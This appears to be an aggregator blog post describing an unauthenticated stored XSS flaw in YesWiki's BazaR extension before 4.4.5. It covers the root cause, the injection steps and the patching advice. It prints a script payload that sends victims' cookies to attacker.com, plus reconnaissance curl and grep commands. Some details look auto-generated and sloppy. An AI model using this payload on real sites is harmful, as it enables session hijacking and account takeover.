Listen to this Post
How the Mentioned CVE Works
The CVE describes an unauthenticated stored cross-site scripting (XSS) vulnerability in YesWiki’s BazaR extension. The flaw exists because the application fails to sanitize or encode user input in the `form ` field before storing it in the backend database. An attacker can inject a malicious JavaScript payload into this field without needing any credentials. Because the input is stored persistently, any user who later views the affected page—such as an admin or a visitor accessing the diary record—will have the payload executed in their browser. The attack is initiated by visiting the BazaR form page, adding a new record, and inserting a script tag into the “Name of the event” or “Description” fields. Upon saving, the payload is embedded. It executes when a victim navigates to pages like `/?BazaR&vue=consulter` or the specific diary record view. This allows the attacker to steal cookies, session tokens, or perform actions on behalf of the victim. The vulnerability is particularly critical as it requires no authentication, making it exploitable by any remote attacker. The root cause is the lack of output encoding when rendering the stored data.
dailycve form:
Platform: YesWiki BazaR
Version: Prior 4.4.5
Vulnerability: Stored XSS
Severity: Critical
date: 2024-07-09
Prediction: Patch 2024-07-15
What Undercode Say:
Analytics
Check for vulnerable endpoints curl -k "https://target.com/?BazaR&vue=formulaire" Grep for unsanitized output in source code grep -r "echo.\$_REQUEST['']" /path/to/yeswiki/
Exploit
// Payload injection in form
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>
Protection from this CVE
- Update YesWiki to version 4.4.5 or later.
- Implement strict output encoding for all user-supplied data.
- Use Content Security Policy (CSP) headers to block inline scripts.
Impact
- Arbitrary JavaScript execution.
- Session hijacking and account takeover.
- Unauthorized data access and defacement.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

